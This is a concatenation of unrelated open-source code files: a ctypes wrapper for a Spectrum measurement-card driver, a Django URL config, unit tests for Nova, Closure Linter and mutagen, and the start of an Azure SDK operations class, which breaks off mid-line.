[c_char_p] spcm_hOpen.restype = drv_handle # load spcm_vClose if (bIs64Bit): spcm_vClose = getattr (spcmDll, "spcm_vClose") else: spcm_vClose = getattr (spcmDll, "_spcm_vClose@4") spcm_vClose.argtype = [drv_handle] spcm_vClose.restype = None # load spcm_dwGetErrorInfo if (bIs64Bit): spcm_dwGetErrorInfo_i32 = getattr (spcmDll, "spcm_dwGetErrorInfo_i32") else: spcm_dwGetErrorInfo_i32 = getattr (spcmDll, "_spcm_dwGetErrorInfo_i32@16") spcm_dwGetErrorInfo_i32.argtype = [drv_handle, uptr32, ptr32, c_char_p] spcm_dwGetErrorInfo_i32.restype = uint32 # load spcm_dwGetParam_i32 if (bIs64Bit): spcm_dwGetParam_i32 = getattr (spcmDll, "spcm_dwGetParam_i32") else: spcm_dwGetParam_i32 = getattr (spcmDll, "_spcm_dwGetParam_i32@12") spcm_dwGetParam_i32.argtype = [drv_handle, int32, ptr32] spcm_dwGetParam_i32.restype = uint32 # load spcm_dwGetParam_i64 if (bIs64Bit): spcm_dwGetParam_i64 = getattr (spcmDll, "spcm_dwGetParam_i64") else: spcm_dwGetParam_i64 = getattr (spcmDll, "_spcm_dwGetParam_i64@12") spcm_dwGetParam_i64.argtype = [drv_handle, int32, ptr64] spcm_dwGetParam_i64.restype = uint32 # load spcm_dwSetParam_i32 if (bIs64Bit): spcm_dwSetParam_i32 = getattr (spcmDll, "spcm_dwSetParam_i32") else: spcm_dwSetParam_i32 = getattr (spcmDll, "_spcm_dwSetParam_i32@12") spcm_dwSetParam_i32.argtype = [drv_handle, int32, int32] spcm_dwSetParam_i32.restype = uint32 # load spcm_dwSetParam_i64 if (bIs64Bit): spcm_dwSetParam_i64 = getattr (spcmDll, "spcm_dwSetParam_i64") else: spcm_dwSetParam_i64 = getattr (spcmDll, "_spcm_dwSetParam_i64@16") spcm_dwSetParam_i64.argtype = [drv_handle, int32, int64] spcm_dwSetParam_i64.restype = uint32 # load spcm_dwSetParam_i64m if (bIs64Bit): spcm_dwSetParam_i64m = getattr (spcmDll, "spcm_dwSetParam_i64m") else: spcm_dwSetParam_i64m = getattr (spcmDll, "_spcm_dwSetParam_i64m@16") spcm_dwSetParam_i64m.argtype = [drv_handle, int32, int32, int32] spcm_dwSetParam_i64m.restype = uint32 # load spcm_dwDefTransfer_i64 if (bIs64Bit): spcm_dwDefTransfer_i64 = getattr (spcmDll, "spcm_dwDefTransfer_i64") else: spcm_dwDefTransfer_i64 = getattr (spcmDll, "_spcm_dwDefTransfer_i64@36") spcm_dwDefTransfer_i64.argtype = [drv_handle, uint32, uint32, uint32, c_void_p, uint64, uint64] spcm_dwDefTransfer_i64.restype = uint32 # load spcm_dwInvalidateBuf if (bIs64Bit): spcm_dwInvalidateBuf = getattr (spcmDll, "spcm_dwInvalidateBuf") else: spcm_dwInvalidateBuf = getattr (spcmDll, "_spcm_dwInvalidateBuf@8") spcm_dwInvalidateBuf.argtype = [drv_handle, uint32] spcm_dwInvalidateBuf.restype = uint32 # load spcm_dwGetContBuf_i64 if (bIs64Bit): spcm_dwGetContBuf_i64 = getattr (spcmDll, "spcm_dwGetContBuf_i64") else: spcm_dwGetContBuf_i64 = getattr (spcmDll, "_spcm_dwGetContBuf_i64@16") spcm_dwGetContBuf_i64.argtype = [drv_handle, uint32, POINTER(c_void_p), uptr64] spcm_dwGetContBuf_i64.restype = uint32 elif os.name == 'posix': sys.stdout.write("Python Version: {0} on Linux\n\n".format (platform.python_version())) # define card handle type if (bIs64Bit): drv_handle = POINTER(c_uint64) else: drv_handle = c_void_p # Load DLL into memory. # use cdll because all driver access functions use cdecl calling convention under linux spcmDll = cdll.LoadLibrary ("libspcm_linux.so") # load spcm_hOpen spcm_hOpen = getattr (spcmDll, "spcm_hOpen") spcm_hOpen.argtype = [c_char_p] spcm_hOpen.restype = drv_handle # load spcm_vClose spcm_vClose = getattr (spcmDll, "spcm_vClose") spcm_vClose.argtype = [drv_handle] spcm_vClose.restype = None # load spcm_dwGetErrorInfo spcm_dwGetErrorInfo_i32 = getattr (spcmDll, "spcm_dwGetErrorInfo_i32") spcm_dwGetErrorInfo_i32.argtype = [drv_handle, uptr32, ptr32, c_char_p] spcm_dwGetErrorInfo_i32.restype = uint32 # load spcm_dwGetParam_i32 spcm_dwGetParam_i32 = getattr (spcmDll, "spcm_dwGetParam_i32") spcm_dwGetParam_i32.argtype = [drv_handle, int32, ptr32] spcm_dwGetParam_i32.restype = uint32 # load spcm_dwGetParam_i64 spcm_dwGetParam_i64 = getattr (spcmDll, "spcm_dwGetParam_i64") spcm_dwGetParam_i64.argtype = [drv_handle, int32, ptr64] spcm_dwGetParam_i64.restype = uint32 # load spcm_dwSetParam_i32 spcm_dwSetParam_i32 = getattr (spcmDll, "spcm_dwSetParam_i32") spcm_dwSetParam_i32.argtype = [drv_handle, int32, int32] spcm_dwSetParam_i32.restype = uint32 # load spcm_dwSetParam_i64 spcm_dwSetParam_i64 = getattr (spcmDll, "spcm_dwSetParam_i64") spcm_dwSetParam_i64.argtype = [drv_handle, int32, int64] spcm_dwSetParam_i64.restype = uint32 # load spcm_dwSetParam_i64m spcm_dwSetParam_i64m = getattr (spcmDll, "spcm_dwSetParam_i64m") spcm_dwSetParam_i64m.argtype = [drv_handle, int32, int32, int32] spcm_dwSetParam_i64m.restype = uint32 # load spcm_dwDefTransfer_i64 spcm_dwDefTransfer_i64 = getattr (spcmDll, "spcm_dwDefTransfer_i64") spcm_dwDefTransfer_i64.argtype = [drv_handle, uint32, uint32, uint32, c_void_p, uint64, uint64] spcm_dwDefTransfer_i64.restype = uint32 # load spcm_dwInvalidateBuf spcm_dwInvalidateBuf = getattr (spcmDll, "spcm_dwInvalidateBuf") spcm_dwInvalidateBuf.argtype = [drv_handle, uint32] spcm_dwInvalidateBuf.restype = uint32 # load spcm_dwGetContBuf_i64 spcm_dwGetContBuf_i64 = getattr (spcmDll, "spcm_dwGetContBuf_i64") spcm_dwGetContBuf_i64.argtype = [drv_handle, uint32, POINTER(c_void_p), uptr64] spcm_dwGetContBuf_i64.restype = uint32 else: raise Exception ('Operating system not supported by pySpcm')
gpl-3.0
Dev-Cloud-Platform/Dev-Cloud
dev_cloud/web_service/urls/user/environment.py
1
5340
# -*- coding: utf-8 -*- # @COPYRIGHT_begin # # Copyright [2015] Michał Szczygieł, M4GiK Software # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # # @COPYRIGHT_end from django.conf.urls import patterns, url, include from core.utils.decorators import user_permission, vm_permission from web_service.views.user.enviroment import wizard_setup, generate_dependencies, customize_environment, \ define_environment, summary, validation_process, validation_process_ip, validation_process_resources, \ validation_process_ip_pre, view_environment, environments_list, get_vm_status, destroy_vm, refresh_vm_tasks, \ show_vnc, get_cpu_load, get_ssh_key, view_predefined, customize_predefined_environment, \ define_predefined_environment main_patterns = patterns('web_service.views.user.enviroment', url(r'^app/create/environment/$', user_permission(wizard_setup), name='personalized_environment'), url(r'^app/create/environment/technology/(?P<technology>\w+)/$', user_permission(generate_dependencies), name='generate_dependencies'), url( r'^app/create/environment/customize/(?P<technology>\w+)/(?P<application>[\w\-]+)/(?P<operation>\w+)/$', user_permission(customize_environment), name='customize_environment'), url(r'^app/create/environment/define/(?P<technology>\w+)/(?P<exposed_ip>\w+)/$', user_permission(define_environment), name='define_environment'), url(r'^app/create/environment/summary/$', user_permission(summary), name='summary'), url(r'^app/create/environment/validation_process/(?P<template>\w+)/(?P<exposed_ip>\w+)/$', user_permission(validation_process), name='validation_process'), url(r'^app/create/environment/validation_process_ip/(?P<exposed_ip>\w+)/$', user_permission(validation_process_ip), name='validation_process_ip'), url(r'^app/create/environment/validation_process_ip_pre/(?P<exposed_ip>\w+)/$', user_permission(validation_process_ip_pre), name='validation_process_ip_pre'), url(r'^app/create/environment/validation_process_resources/(?P<template_id>\w+)/$', user_permission(validation_process_resources), name='validation_process_resources'), url(r'^app/environments/$', user_permission(environments_list), name='environments_list'), url(r'^app/environments/(?P<destroy_status>\w+)/$', user_permission(environments_list), name='environments_list'), url(r'^app/environments/show_vm/(?P<vm_id>\w+)/$', vm_permission(view_environment), name='view_environment'), url(r'^app/environments/vm_status/(?P<vm_id>\w+)/$', vm_permission(get_vm_status), name='get_vm_status'), url(r'^app/environments/destroy/(?P<vm_id>\w+)/$', vm_permission(destroy_vm), name='destroy_vm'), url(r'^app/environments/refresh_tasks/(?P<vm_id>\w+)/$', vm_permission(refresh_vm_tasks), name='refresh_vm_tasks'), url(r'^app/environments/show_vm/vnc/(?P<vm_id>\w+)/$', vm_permission(show_vnc), name='show_vnc'), url(r'^app/environments/show_vm/cpu_load/(?P<vm_id>\w+)/$', vm_permission(get_cpu_load), name='get_cpu_load'), url(r'^app/environments/show_vm/get_ssh_key/(?P<vm_id>\w+)/$', vm_permission(get_ssh_key), name='get_ssh_key'), url(r'^app/create/environment/predefined/$', user_permission(view_predefined), name='predefined_environment'), url( r'^app/create/environment/predefined/customize/(?P<application>[\w\-]+)/(?P<operation>\w+)/$', user_permission(customize_predefined_environment), name='customize_predefined_environment'), url( r'^app/create/environment/predefined/define/(?P<application>[\w\-]+)/(?P<exposed_ip>\w+)/$', user_permission(define_predefined_environment), name='define_predefined_environment')) urlpatterns = patterns('', url(r'^main/', include(main_patterns)))
apache-2.0
Yuriy-Leonov/nova
nova/tests/api/openstack/compute/contrib/test_flavor_swap.py
11
3422
# Copyright 2012 Nebula, Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. from lxml import etree import webob from nova.compute import flavors from nova.openstack.common import jsonutils from nova import test from nova.tests.api.openstack import fakes FAKE_FLAVORS = { 'flavor 1': { "flavorid": '1', "name": 'flavor 1', "memory_mb": '256', "root_gb": '10', "swap": 512, }, 'flavor 2': { "flavorid": '2', "name": 'flavor 2', "memory_mb": '512', "root_gb": '10', "swap": None, }, } #TOD(jogo) dedup these accross nova.api.openstack.contrib.test_flavor* def fake_flavor_get_by_flavor_id(flavorid, ctxt=None): return FAKE_FLAVORS['flavor %s' % flavorid] def fake_get_all_flavors_sorted_list(context=None, inactive=False, filters=None, sort_key='flavorid', sort_dir='asc', limit=None, marker=None): return [ fake_flavor_get_by_flavor_id(1), fake_flavor_get_by_flavor_id(2) ] class FlavorSwapTest(test.NoDBTestCase): content_type = 'application/json' prefix = '' def setUp(self): super(FlavorSwapTest, self).setUp() ext = ('nova.api.openstack.compute.contrib' '.flavor_swap.Flavor_swap') self.flags(osapi_compute_extension=[ext]) fakes.stub_out_nw_api(self.stubs) self.stubs.Set(flavors, "get_all_flavors_sorted_list", fake_get_all_flavors_sorted_list) self.stubs.Set(flavors, "get_flavor_by_flavor_id", fake_flavor_get_by_flavor_id) def _make_request(self, url): req = webob.Request.blank(url) req.headers['Accept'] = self.content_type res = req.get_response(fakes.wsgi_app()) return res def _get_flavor(self, body): return jsonutils.loads(body).get('flavor') def _get_flavors(self, body): return jsonutils.loads(body).get('flavors') def assertFlavorSwap(self, flavor, swap): self.assertEqual(str(flavor.get('%sswap' % self.prefix)), swap) def test_show(self): url = '/v2/fake/flavors/1' res = self._make_request(url) self.assertEqual(res.status_int, 200) self.assertFlavorSwap(self._get_flavor(res.body), '512') def test_detail(self): url = '/v2/fake/flavors/detail' res = self._make_request(url) self.assertEqual(res.status_int, 200) flavors = self._get_flavors(res.body) self.assertFlavorSwap(flavors[0], '512') self.assertFlavorSwap(flavors[1], '') class FlavorSwapXmlTest(FlavorSwapTest): content_type = 'application/xml' def _get_flavor(self, body): return etree.XML(body) def _get_flavors(self, body): return etree.XML(body).getchildren()
apache-2.0
yinquan529/platform-external-chromium_org
third_party/closure_linter/closure_linter/fixjsstyle_test.py
135
7371
#!/usr/bin/env python # # Copyright 2008 The Closure Linter Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS-IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Medium tests for the gpylint auto-fixer.""" __author__ = 'robbyw@google.com (Robby Walker)' import StringIO import gflags as flags import unittest as googletest from closure_linter import checker from closure_linter import error_fixer _RESOURCE_PREFIX = 'closure_linter/testdata' flags.FLAGS.strict = True flags.FLAGS.limited_doc_files = ('dummy.js', 'externs.js') flags.FLAGS.closurized_namespaces = ('goog', 'dummy') class FixJsStyleTest(googletest.TestCase): """Test case to for gjslint auto-fixing.""" def testFixJsStyle(self): test_cases = [['fixjsstyle.in.js', 'fixjsstyle.out.js'], ['indentation.js', 'fixjsstyle.indentation.out.js']] for [running_input_file, running_output_file] in test_cases: input_filename = None golden_filename = None current_filename = None try: input_filename = '%s/%s' % (_RESOURCE_PREFIX, running_input_file) current_filename = input_filename golden_filename = '%s/%s' % (_RESOURCE_PREFIX, running_output_file) current_filename = golden_filename except IOError, ex: raise IOError('Could not find testdata resource for %s: %s' % (current_filename, ex)) if running_input_file == 'fixjsstyle.in.js': with open(input_filename) as f: for line in f: # Go to last line. pass self.assertTrue(line == line.rstrip(), '%s file should not end ' 'with a new line.' % (input_filename)) # Autofix the file, sending output to a fake file. actual = StringIO.StringIO() style_checker = checker.JavaScriptStyleChecker( error_fixer.ErrorFixer(actual)) style_checker.Check(input_filename) # Now compare the files. actual.seek(0) expected = open(golden_filename, 'r') self.assertEqual(actual.readlines(), expected.readlines()) def testMissingExtraAndUnsortedRequires(self): """Tests handling of missing extra and unsorted goog.require statements.""" original = [ "goog.require('dummy.aa');", "goog.require('dummy.Cc');", "goog.require('dummy.Dd');", "", "var x = new dummy.Bb();", "dummy.Cc.someMethod();", "dummy.aa.someMethod();", ] expected = [ "goog.require('dummy.Bb');", "goog.require('dummy.Cc');", "goog.require('dummy.aa');", "", "var x = new dummy.Bb();", "dummy.Cc.someMethod();", "dummy.aa.someMethod();", ] self._AssertFixes(original, expected) def testMissingExtraAndUnsortedProvides(self): """Tests handling of missing extra and unsorted goog.provide statements.""" original = [ "goog.provide('dummy.aa');", "goog.provide('dummy.Cc');", "goog.provide('dummy.Dd');", "", "dummy.Cc = function() {};", "dummy.Bb = function() {};", "dummy.aa.someMethod = function();", ] expected = [ "goog.provide('dummy.Bb');", "goog.provide('dummy.Cc');", "goog.provide('dummy.aa');", "", "dummy.Cc = function() {};", "dummy.Bb = function() {};", "dummy.aa.someMethod = function();", ] self._AssertFixes(original, expected) def testNoRequires(self): """Tests positioning of missing requires without existing requires.""" original = [ "goog.provide('dummy.Something');", "", "dummy.Something = function() {};", "", "var x = new dummy.Bb();", ] expected = [ "goog.provide('dummy.Something');", "", "goog.require('dummy.Bb');", "", "dummy.Something = function() {};", "", "var x = new dummy.Bb();", ] self._AssertFixes(original, expected) def testNoProvides(self): """Tests positioning of missing provides without existing provides.""" original = [ "goog.require('dummy.Bb');", "", "dummy.Something = function() {};", "", "var x = new dummy.Bb();", ] expected = [ "goog.provide('dummy.Something');", "", "goog.require('dummy.Bb');", "", "dummy.Something = function() {};", "", "var x = new dummy.Bb();", ] self._AssertFixes(original, expected) def testGoogScopeIndentation(self): """Tests Handling a typical end-of-scope indentation fix.""" original = [ 'goog.scope(function() {', ' // TODO(brain): Take over the world.', '}); // goog.scope', ] expected = [ 'goog.scope(function() {', '// TODO(brain): Take over the world.', '}); // goog.scope', ] self._AssertFixes(original, expected) def testMissingEndOfScopeComment(self): """Tests Handling a missing comment at end of goog.scope.""" original = [ 'goog.scope(function() {', '});', ] expected = [ 'goog.scope(function() {', '}); // goog.scope', ] self._AssertFixes(original, expected) def testMissingEndOfScopeCommentWithOtherComment(self): """Tests handling an irrelevant comment at end of goog.scope.""" original = [ 'goog.scope(function() {', "}); // I don't belong here!", ] expected = [ 'goog.scope(function() {', '}); // goog.scope', ] self._AssertFixes(original, expected) def testMalformedEndOfScopeComment(self): """Tests Handling a malformed comment at end of goog.scope.""" original = [ 'goog.scope(function() {', '}); // goog.scope FTW', ] expected = [ 'goog.scope(function() {', '}); // goog.scope', ] self._AssertFixes(original, expected) def _AssertFixes(self, original, expected): """Asserts that the error fixer corrects original to expected.""" original = self._GetHeader() + original expected = self._GetHeader() + expected actual = StringIO.StringIO() style_checker = checker.JavaScriptStyleChecker( error_fixer.ErrorFixer(actual)) style_checker.CheckLines('testing.js', original, False) actual.seek(0) expected = [x + '\n' for x in expected] self.assertListEqual(actual.readlines(), expected) def _GetHeader(self): """Returns a fake header for a JavaScript file.""" return [ "// Copyright 2011 Google Inc. All Rights Reserved.", "", "/**", " * @fileoverview Fake file overview.", " * @author fake@google.com (Fake Person)", " */", "" ] if __name__ == '__main__': googletest.main()
bsd-3-clause
vahgar/mutagen
tests/test_easyid3.py
4
12780
import os import shutil import pickle from tests import TestCase from mutagen.id3 import ID3FileType, ID3 from mutagen.easyid3 import EasyID3, error as ID3Error from mutagen._compat import PY3 from tempfile import mkstemp class TEasyID3(TestCase): def setUp(self): fd, self.filename = mkstemp('.mp3') os.close(fd) empty = os.path.join('tests', 'data', 'emptyfile.mp3') shutil.copy(empty, self.filename) self.id3 = EasyID3() def test_remember_ctr(self): empty = os.path.join('tests', 'data', 'emptyfile.mp3') mp3 = ID3FileType(empty, ID3=EasyID3) self.failIf(mp3.tags) mp3["artist"] = ["testing"] self.failUnless(mp3.tags) mp3.pprint() self.failUnless(isinstance(mp3.tags, EasyID3)) def test_ignore_23(self): self.id3["date"] = "2004" self.id3.save(self.filename, v2_version=3) self.assertEqual(ID3(self.filename).version, (2, 4, 0)) def test_delete(self): self.id3["artist"] = "foobar" self.id3.save(self.filename) self.failUnless(os.path.getsize(self.filename)) self.id3.delete(self.filename) self.failIf(os.path.getsize(self.filename)) self.failIf(self.id3) def test_pprint(self): self.id3["artist"] = "baz" self.id3.pprint() def test_in(self): self.failIf("foo" in self.id3) if not PY3: def test_has_key(self): self.failIf(self.id3.has_key("foo")) def test_empty_file(self): empty = os.path.join('tests', 'data', 'emptyfile.mp3') self.assertRaises(ID3Error, EasyID3, filename=empty) def test_nonexistent_file(self): empty = os.path.join('tests', 'data', 'does', 'not', 'exist') self.assertRaises(IOError, EasyID3, filename=empty) def test_write_single(self): for key in EasyID3.valid_keys: if (key == "date") or (key == "originaldate"): continue elif key.startswith("replaygain_"): continue # Test creation self.id3[key] = "a test value" self.id3.save(self.filename) id3 = EasyID3(self.filename) self.failUnlessEqual(id3[key], ["a test value"]) self.failUnlessEqual(id3.keys(), [key]) # And non-creation setting. self.id3[key] = "a test value" self.id3.save(self.filename) id3 = EasyID3(self.filename) self.failUnlessEqual(id3[key], ["a test value"]) self.failUnlessEqual(id3.keys(), [key]) del(self.id3[key]) def test_write_double(self): for key in EasyID3.valid_keys: if (key == "date") or (key == "originaldate"): continue elif key.startswith("replaygain_"): continue elif key == "musicbrainz_trackid": continue self.id3[key] = ["a test", "value"] self.id3.save(self.filename) id3 = EasyID3(self.filename) # some keys end up in multiple frames and ID3.getall returns # them in undefined order self.failUnlessEqual(sorted(id3.get(key)), ["a test", "value"]) self.failUnlessEqual(id3.keys(), [key]) self.id3[key] = ["a test", "value"] self.id3.save(self.filename) id3 = EasyID3(self.filename) self.failUnlessEqual(sorted(id3.get(key)), ["a test", "value"]) self.failUnlessEqual(id3.keys(), [key]) del(self.id3[key]) def test_write_date(self): self.id3["date"] = "2004" self.id3.save(self.filename) id3 = EasyID3(self.filename) self.failUnlessEqual(id3["date"], ["2004"]) self.id3["date"] = "2004" self.id3.save(self.filename) id3 = EasyID3(self.filename) self.failUnlessEqual(id3["date"], ["2004"]) def test_date_delete(self): self.id3["date"] = "2004" self.failUnlessEqual(self.id3["date"], ["2004"]) del(self.id3["date"]) self.failIf("date" in self.id3.keys()) def test_write_date_double(self): self.id3["date"] = ["2004", "2005"] self.id3.save(self.filename) id3 = EasyID3(self.filename) self.failUnlessEqual(id3["date"], ["2004", "2005"]) self.id3["date"] = ["2004", "2005"] self.id3.save(self.filename) id3 = EasyID3(self.filename) self.failUnlessEqual(id3["date"], ["2004", "2005"]) def test_write_original_date(self): self.id3["originaldate"] = "2004" self.id3.save(self.filename) id3 = EasyID3(self.filename) self.failUnlessEqual(id3["originaldate"], ["2004"]) self.id3["originaldate"] = "2004" self.id3.save(self.filename) id3 = EasyID3(self.filename) self.failUnlessEqual(id3["originaldate"], ["2004"]) def test_original_date_delete(self): self.id3["originaldate"] = "2004" self.failUnlessEqual(self.id3["originaldate"], ["2004"]) del(self.id3["originaldate"]) self.failIf("originaldate" in self.id3.keys()) def test_write_original_date_double(self): self.id3["originaldate"] = ["2004", "2005"] self.id3.save(self.filename) id3 = EasyID3(self.filename) self.failUnlessEqual(id3["originaldate"], ["2004", "2005"]) self.id3["originaldate"] = ["2004", "2005"] self.id3.save(self.filename) id3 = EasyID3(self.filename) self.failUnlessEqual(id3["originaldate"], ["2004", "2005"]) def test_write_invalid(self): self.failUnlessRaises(ValueError, self.id3.__getitem__, "notvalid") self.failUnlessRaises(ValueError, self.id3.__delitem__, "notvalid") self.failUnlessRaises( ValueError, self.id3.__setitem__, "notvalid", "tests") def test_perfomer(self): self.id3["performer:coder"] = ["piman", "mu"] self.id3.save(self.filename) id3 = EasyID3(self.filename) self.failUnlessEqual(id3["performer:coder"], ["piman", "mu"]) def test_no_performer(self): self.failIf("performer:foo" in self.id3) def test_performer_delete(self): self.id3["performer:foo"] = "Joe" self.id3["performer:bar"] = "Joe" self.failUnless("performer:foo" in self.id3) self.failUnless("performer:bar" in self.id3) del(self.id3["performer:foo"]) self.failIf("performer:foo" in self.id3) self.failUnless("performer:bar" in self.id3) del(self.id3["performer:bar"]) self.failIf("performer:bar" in self.id3) self.failIf("TMCL" in self.id3._EasyID3__id3) def test_performer_delete_dne(self): self.failUnlessRaises(KeyError, self.id3.__delitem__, "performer:bar") self.id3["performer:foo"] = "Joe" self.failUnlessRaises(KeyError, self.id3.__delitem__, "performer:bar") def test_txxx_empty(self): # http://code.google.com/p/mutagen/issues/detail?id=135 self.id3["asin"] = "" def test_txxx_set_get(self): self.failIf("asin" in self.id3.keys()) self.id3["asin"] = "Hello" self.failUnless("asin" in self.id3.keys()) self.failUnlessEqual(self.id3["asin"], ["Hello"]) self.failUnless("TXXX:ASIN" in self.id3._EasyID3__id3) def test_txxx_del_set_del(self): self.failIf("asin" in self.id3.keys()) self.failUnlessRaises(KeyError, self.id3.__delitem__, "asin") self.id3["asin"] = "Hello" self.failUnless("asin" in self.id3.keys()) self.failUnlessEqual(self.id3["asin"], ["Hello"]) del(self.id3["asin"]) self.failIf("asin" in self.id3.keys()) self.failUnlessRaises(KeyError, self.id3.__delitem__, "asin") def test_txxx_save(self): self.id3["asin"] = "Hello" self.id3.save(self.filename) id3 = EasyID3(self.filename) self.failUnlessEqual(id3["asin"], ["Hello"]) def test_txxx_unicode(self): self.id3["asin"] = u"He\u1234llo" self.failUnlessEqual(self.id3["asin"], [u"He\u1234llo"]) def test_bad_trackid(self): self.failUnlessRaises(ValueError, self.id3.__setitem__, "musicbrainz_trackid", ["a", "b"]) self.failIf(self.id3._EasyID3__id3.getall("RVA2")) def test_gain_bad_key(self): self.failIf("replaygain_foo_gain" in self.id3) self.failIf(self.id3._EasyID3__id3.getall("RVA2")) def test_gain_bad_value(self): self.failUnlessRaises( ValueError, self.id3.__setitem__, "replaygain_foo_gain", []) self.failUnlessRaises( ValueError, self.id3.__setitem__, "replaygain_foo_gain", ["foo"]) self.failUnlessRaises( ValueError, self.id3.__setitem__, "replaygain_foo_gain", ["1", "2"]) self.failIf(self.id3._EasyID3__id3.getall("RVA2")) def test_peak_bad_key(self): self.failIf("replaygain_foo_peak" in self.id3) self.failIf(self.id3._EasyID3__id3.getall("RVA2")) def test_peak_bad_value(self): self.failUnlessRaises( ValueError, self.id3.__setitem__, "replaygain_foo_peak", []) self.failUnlessRaises( ValueError, self.id3.__setitem__, "replaygain_foo_peak", ["foo"]) self.failUnlessRaises( ValueError, self.id3.__setitem__, "replaygain_foo_peak", ["1", "1"]) self.failUnlessRaises( ValueError, self.id3.__setitem__, "replaygain_foo_peak", ["3"]) self.failIf(self.id3._EasyID3__id3.getall("RVA2")) def test_gain_peak_get(self): self.id3["replaygain_foo_gain"] = "+3.5 dB" self.id3["replaygain_bar_peak"] = "0.5" self.failUnlessEqual( self.id3["replaygain_foo_gain"], ["+3.500000 dB"]) self.failUnlessEqual(self.id3["replaygain_foo_peak"], ["0.000000"]) self.failUnlessEqual( self.id3["replaygain_bar_gain"], ["+0.000000 dB"]) self.failUnlessEqual(self.id3["replaygain_bar_peak"], ["0.500000"]) def test_gain_peak_set(self): self.id3["replaygain_foo_gain"] = "+3.5 dB" self.id3["replaygain_bar_peak"] = "0.5" self.id3.save(self.filename) id3 = EasyID3(self.filename) self.failUnlessEqual(id3["replaygain_foo_gain"], ["+3.500000 dB"]) self.failUnlessEqual(id3["replaygain_foo_peak"], ["0.000000"]) self.failUnlessEqual(id3["replaygain_bar_gain"], ["+0.000000 dB"]) self.failUnlessEqual(id3["replaygain_bar_peak"], ["0.500000"]) def test_gain_peak_delete(self): self.id3["replaygain_foo_gain"] = "+3.5 dB" self.id3["replaygain_bar_peak"] = "0.5" del(self.id3["replaygain_bar_gain"]) del(self.id3["replaygain_foo_peak"]) self.failUnless("replaygain_foo_gain" in self.id3.keys()) self.failUnless("replaygain_bar_gain" in self.id3.keys()) del(self.id3["replaygain_foo_gain"]) del(self.id3["replaygain_bar_peak"]) self.failIf("replaygain_foo_gain" in self.id3.keys()) self.failIf("replaygain_bar_gain" in self.id3.keys()) del(self.id3["replaygain_foo_gain"]) del(self.id3["replaygain_bar_peak"]) self.failIf("replaygain_foo_gain" in self.id3.keys()) self.failIf("replaygain_bar_gain" in self.id3.keys()) def test_pickle(self): # http://code.google.com/p/mutagen/issues/detail?id=102 pickle.dumps(self.id3) def test_get_fallback(self): called = [] def get_func(id3, key): id3.getall("") self.failUnlessEqual(key, "nope") called.append(1) self.id3.GetFallback = get_func self.id3["nope"] self.failUnless(called) def test_set_fallback(self): called = [] def set_func(id3, key, value): id3.getall("") self.failUnlessEqual(key, "nope") self.failUnlessEqual(value, ["foo"]) called.append(1) self.id3.SetFallback = set_func self.id3["nope"] = "foo" self.failUnless(called) def test_del_fallback(self): called = [] def del_func(id3, key): id3.getall("") self.failUnlessEqual(key, "nope") called.append(1) self.id3.DeleteFallback = del_func del self.id3["nope"] self.failUnless(called) def test_list_fallback(self): def list_func(id3, key): id3.getall("") self.failIf(key) return ["somekey"] self.id3.ListFallback = list_func self.failUnlessEqual(self.id3.keys(), ["somekey"]) def tearDown(self): os.unlink(self.filename)
gpl-2.0
Azure/azure-sdk-for-python
sdk/network/azure-mgmt-network/azure/mgmt/network/v2020_06_01/aio/operations/_peer_express_route_circuit_connections_operations.py
1
9352
# coding=utf-8 # -------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. See License.txt in the project root for license information. # Code generated by Microsoft (R) AutoRest Code Generator. # Changes may cause incorrect behavior and will be lost if the code is regenerated. # -------------------------------------------------------------------------- from typing import Any, AsyncIterable, Callable, Dict, Generic, Optional, TypeVar import warnings from azure.core.async_paging import AsyncItemPaged, AsyncList from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error from azure.core.pipeline import PipelineResponse from azure.core.pipeline.transport import AsyncHttpResponse, HttpRequest from azure.mgmt.core.exceptions import ARMErrorFormat from ... import models as _models T = TypeVar('T') ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]] class PeerExpressRouteCircuitConnectionsOperations: """PeerExpressRouteCircuitConnectionsOperations async operations. You should not instantiate this class directly. Instead, you should create a Client instance that instantiates it for you and attaches it as an attribute. :ivar models: Alias to model classes used in this operation group. :type models: ~azure.mgmt.network.v2020_06_01.models :param client: Client for service requests. :param config: Configuration of service client. :param serializer: An object model serializer. :param deserializer: An object model deserializer. """ models = _models def __init__(self, client, config, serializer, deserializer) -> None: self._client = client self._serialize = serializer self._deserialize = deserializer self._config = config async def get( self, resource_group_name: str, circuit_name: str, peering_name: str, connection_name: str, **kwargs ) -> "_models.PeerExpressRouteCircuitConnection": """Gets the specified Peer Express Route Circuit Connection from the specified express route circuit. :param resource_group_name: The name of the resource group. :type resource_group_name: str :param circuit_name: The name of the express route circuit. :type circuit_name: str :param peering_name: The name of the peering. :type peering_name: str :param connection_name: The name of the peer express route circuit connection. :type connection_name: str :keyword callable cls: A custom type or function that will be passed the direct response :return: PeerExpressRouteCircuitConnection, or the result of cls(response) :rtype: ~azure.mgmt.network.v2020_06_01.models.PeerExpressRouteCircuitConnection :raises: ~azure.core.exceptions.HttpResponseError """ cls = kwargs.pop('cls', None) # type: ClsType["_models.PeerExpressRouteCircuitConnection"] error_map = { 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError } error_map.update(kwargs.pop('error_map', {})) api_version = "2020-06-01" accept = "application/json" # Construct URL url = 